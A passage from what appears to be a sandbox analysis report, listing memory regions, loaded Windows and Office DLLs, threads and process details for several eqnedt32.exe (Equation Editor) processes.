0x755abfff entry_point = 0x75450000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 676 start_va = 0x755b0000 end_va = 0x7564cfff entry_point = 0x755b0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 677 start_va = 0x756e0000 end_va = 0x7577ffff entry_point = 0x756e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 678 start_va = 0x75780000 end_va = 0x75789fff entry_point = 0x75780000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 679 start_va = 0x75790000 end_va = 0x7588ffff entry_point = 0x75790000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 680 start_va = 0x75c50000 end_va = 0x76899fff entry_point = 0x75c50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 681 start_va = 0x76d80000 end_va = 0x76e6ffff entry_point = 0x76d80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 682 start_va = 0x220000 end_va = 0x3a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 683 start_va = 0x74e30000 end_va = 0x74e8ffff entry_point = 0x74e30000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 684 start_va = 0x75b00000 end_va = 0x75bcbfff entry_point = 0x75b00000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 686 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 687 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 688 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 689 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 690 start_va = 0x490000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 691 start_va = 0x620000 end_va = 0x621fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 692 start_va = 0x9f0000 end_va = 0x1deffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 693 start_va = 0x1df0000 end_va = 0x20befff entry_point = 0x1df0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 694 start_va = 0x20c0000 end_va = 0x24b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020c0000" filename = "" Region: id = 695 start_va = 0x6fff0000 end_va = 0x6fffffff entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 696 start_va = 0x74be0000 end_va = 0x74be2fff entry_point = 0x74be0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 698 start_va = 0x630000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 699 start_va = 0x8c0000 end_va = 0x8cffff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 700 start_va = 0x24c0000 end_va = 0x28bffff entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 701 start_va = 0x74450000 end_va = 0x7468ffff entry_point = 0x74450000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 702 start_va = 0x76b60000 end_va = 0x76beefff entry_point = 0x76b60000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 703 start_va = 0x3de20000 end_va = 0x3de2dfff entry_point = 0x3de20000 region_type = mapped_file name = "eeintl.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\1033\\eeintl.dll") Region: id = 704 start_va = 0x74a70000 end_va = 0x74aeffff entry_point = 0x74a70000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 705 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 706 start_va = 0x710000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 707 start_va = 0x750000 end_va = 0x82efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 708 start_va = 0x75650000 end_va = 0x756d2fff entry_point = 0x75650000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 715 start_va = 0x830000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 716 start_va = 0x870000 end_va = 0x8affff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 717 start_va = 0x28c0000 end_va = 0x29bffff entry_point = 0x0 region_type = private name = "private_0x00000000028c0000" filename = "" Region: id = 718 start_va = 0x29c0000 end_va = 0x2abffff entry_point = 0x0 region_type = private name = "private_0x00000000029c0000" filename = "" Region: id = 719 start_va = 0x74890000 end_va = 0x748a5fff entry_point = 0x74890000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 720 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 721 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 722 start_va = 0x74850000 end_va = 0x7488afff entry_point = 0x74850000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 723 start_va = 0x74680000 end_va = 0x7468dfff entry_point = 0x74680000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 724 start_va = 0x2ac0000 end_va = 0x2afffff entry_point = 0x0 region_type = private name = "private_0x0000000002ac0000" filename = "" Region: id = 725 start_va = 0x2b00000 end_va = 0x2bfffff entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 726 start_va = 0x2c00000 end_va = 0x2c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 727 start_va = 0x2c40000 end_va = 0x2d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c40000" filename = "" Region: id = 728 start_va = 0x2d40000 end_va = 0x2dbffff entry_point = 0x0 region_type = private name = "private_0x0000000002d40000" filename = "" Region: id = 729 start_va = 0x2dc0000 end_va = 0x2e7ffff entry_point = 0x2dc0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 730 start_va = 0x2f30000 end_va = 0x2f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 731 start_va = 0x74a50000 end_va = 0x74a62fff entry_point = 0x74a50000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 732 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 733 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Thread: id = 32 os_tid = 0xb00 Thread: id = 33 os_tid = 0xb04 Thread: id = 35 os_tid = 0xb0c Thread: id = 36 os_tid = 0xb10 Thread: id = 37 os_tid = 0xb14 Process: id = "5" image_name = "eqnedt32.exe" filename = "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\eqnedt32.exe" page_root = "0x54edb000" os_pid = "0xb18" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0xa0c" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010636" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 738 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 739 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 740 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 741 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 742 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 743 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 744 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 745 start_va = 0x400000 end_va = 0x48dfff entry_point = 0x400000 region_type = mapped_file name = "eqnedt32.exe" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\eqnedt32.exe") Region: id = 746 start_va = 0x77090000 end_va = 0x77238fff entry_point = 0x77090000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 747 start_va = 0x77270000 end_va = 0x773effff entry_point = 0x77270000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 748 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 749 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 750 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 751 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 752 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 753 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 754 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 755 start_va = 0x250000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 756 start_va = 0x74b00000 end_va = 0x74b07fff entry_point = 0x74b00000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 757 start_va = 0x74b10000 end_va = 0x74b6bfff entry_point = 0x74b10000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 758 start_va = 0x74b70000 end_va = 0x74baefff entry_point = 0x74b70000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 759 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 760 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 761 start_va = 0x530000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 762 start_va = 0x75250000 end_va = 0x75295fff entry_point = 0x75250000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 763 start_va = 0x759f0000 end_va = 0x75afffff entry_point = 0x759f0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 764 start_va = 0x76e70000 end_va = 0x76f69fff entry_point = 0x0 region_type = private name = "private_0x0000000076e70000" filename = "" Region: id = 765 start_va = 0x76f70000 end_va = 0x7708efff entry_point = 0x0 region_type = private name = "private_0x0000000076f70000" filename = "" Region: id = 766 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 767 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 768 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 769 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 770 start_va = 0x7d0000 end_va = 0x7dffff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 771 start_va = 0x74690000 end_va = 0x74844fff entry_point = 0x74690000 region_type = mapped_file name = "appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 772 start_va = 0x748b0000 end_va = 0x74933fff entry_point = 0x748b0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 773 start_va = 0x74940000 end_va = 0x74a0afff entry_point = 0x74940000 region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll") Region: id = 774 start_va = 0x74bf0000 end_va = 0x74bfafff entry_point = 0x74bf0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 775 start_va = 0x74c00000 end_va = 0x74c16fff entry_point = 0x74c00000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 776 start_va = 0x74c20000 end_va = 0x74c84fff entry_point = 0x74c20000 region_type = mapped_file name = "appvisvstream32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll") Region: id = 777 start_va = 0x74dc0000 end_va = 0x74dcbfff entry_point = 0x74dc0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 778 start_va = 0x74dd0000 end_va = 0x74e2ffff entry_point = 0x74dd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 779 start_va = 0x74e90000 end_va = 0x74ea8fff entry_point = 0x74e90000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 780 start_va = 0x750d0000 end_va = 0x75126fff entry_point = 0x750d0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 781 start_va = 0x75130000 end_va = 0x751bffff entry_point = 0x75130000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 782 start_va = 0x752a0000 end_va = 0x7534bfff entry_point = 0x752a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 783 start_va = 0x75450000 end_va = 0x755abfff entry_point = 0x75450000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 784 start_va = 0x755b0000 end_va = 0x7564cfff entry_point = 0x755b0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 785 start_va = 0x756e0000 end_va = 0x7577ffff entry_point = 0x756e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 786 start_va = 0x75780000 end_va = 0x75789fff entry_point = 0x75780000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 787 start_va = 0x75790000 end_va = 0x7588ffff entry_point = 0x75790000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 788 start_va = 0x75c50000 end_va = 0x76899fff entry_point = 0x75c50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 789 start_va = 0x76d80000 end_va = 0x76e6ffff entry_point = 0x76d80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 790 start_va = 0x630000 end_va = 0x7b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 791 start_va = 0x74e30000 end_va = 0x74e8ffff entry_point = 0x74e30000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 792 start_va = 0x75b00000 end_va = 0x75bcbfff entry_point = 0x75b00000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 794 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 795 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 796 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 797 start_va = 0x2d0000 end_va = 0x2d6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 798 start_va = 0x2e0000 end_va = 0x2e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 799 start_va = 0x7e0000 end_va = 0x960fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 800 start_va = 0x970000 end_va = 0x1d6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 801 start_va = 0x1d70000 end_va = 0x203efff entry_point = 0x1d70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 802 start_va = 0x2040000 end_va = 0x2432fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002040000" filename = "" Region: id = 803 start_va = 0x6fff0000 end_va = 0x6fffffff entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 804 start_va = 0x74be0000 end_va = 0x74be2fff entry_point = 0x74be0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 805 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 806 start_va = 0x2620000 end_va = 0x262ffff entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 807 start_va = 0x2630000 end_va = 0x2a2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 808 start_va = 0x74390000 end_va = 0x745cffff entry_point = 0x74390000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 809 start_va = 0x76b60000 end_va = 0x76beefff entry_point = 0x76b60000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 810 start_va = 0x3de20000 end_va = 0x3de2dfff entry_point = 0x3de20000 region_type = mapped_file name = "eeintl.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\1033\\eeintl.dll") Region: id = 811 start_va = 0x74a70000 end_va = 0x74aeffff entry_point = 0x74a70000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 812 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 813 start_va = 0x2440000 end_va = 0x251efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002440000" filename = "" Region: id = 814 start_va = 0x2540000 end_va = 0x257ffff entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 815 start_va = 0x75650000 end_va = 0x756d2fff entry_point = 0x75650000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 816 start_va = 0x300000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 817 start_va = 0x340000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 818 start_va = 0x2a30000 end_va = 0x2b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a30000" filename = "" Region: id = 819 start_va = 0x2b30000 end_va = 0x2c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 820 start_va = 0x74870000 end_va = 0x74885fff entry_point = 0x74870000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 821 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 822 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 823 start_va = 0x74590000 end_va = 0x745cafff entry_point = 0x74590000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 824 start_va = 0x748a0000 end_va = 0x748adfff entry_point = 0x748a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 825 start_va = 0x3a0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 826 start_va = 0x490000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 827 start_va = 0x2580000 end_va = 0x25fffff entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 828 start_va = 0x2c30000 end_va = 0x2d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c30000" filename = "" Region: id = 829 start_va = 0x2d30000 end_va = 0x2e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d30000" filename = "" Region: id = 830 start_va = 0x2e30000 end_va = 0x2eeffff entry_point = 0x2e30000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 831 start_va = 0x2fa0000 end_va = 0x2fdffff entry_point = 0x0 region_type = private name = "private_0x0000000002fa0000" filename = "" Region: id = 832 start_va = 0x74a50000 end_va = 0x74a62fff entry_point = 0x74a50000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 833 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 834 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Thread: id = 38 os_tid = 0xb1c Thread: id = 39 os_tid = 0xb24 Thread: id = 40 os_tid = 0xb28 Thread: id = 41 os_tid = 0xb2c Thread: id = 42 os_tid = 0xb30 Process: id = "6" image_name = "eqnedt32.exe" filename = "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\eqnedt32.exe" page_root = "0x54da2000" os_pid = "0xb34" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa0c" cmd_line = "\"C:\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding" cur_dir = 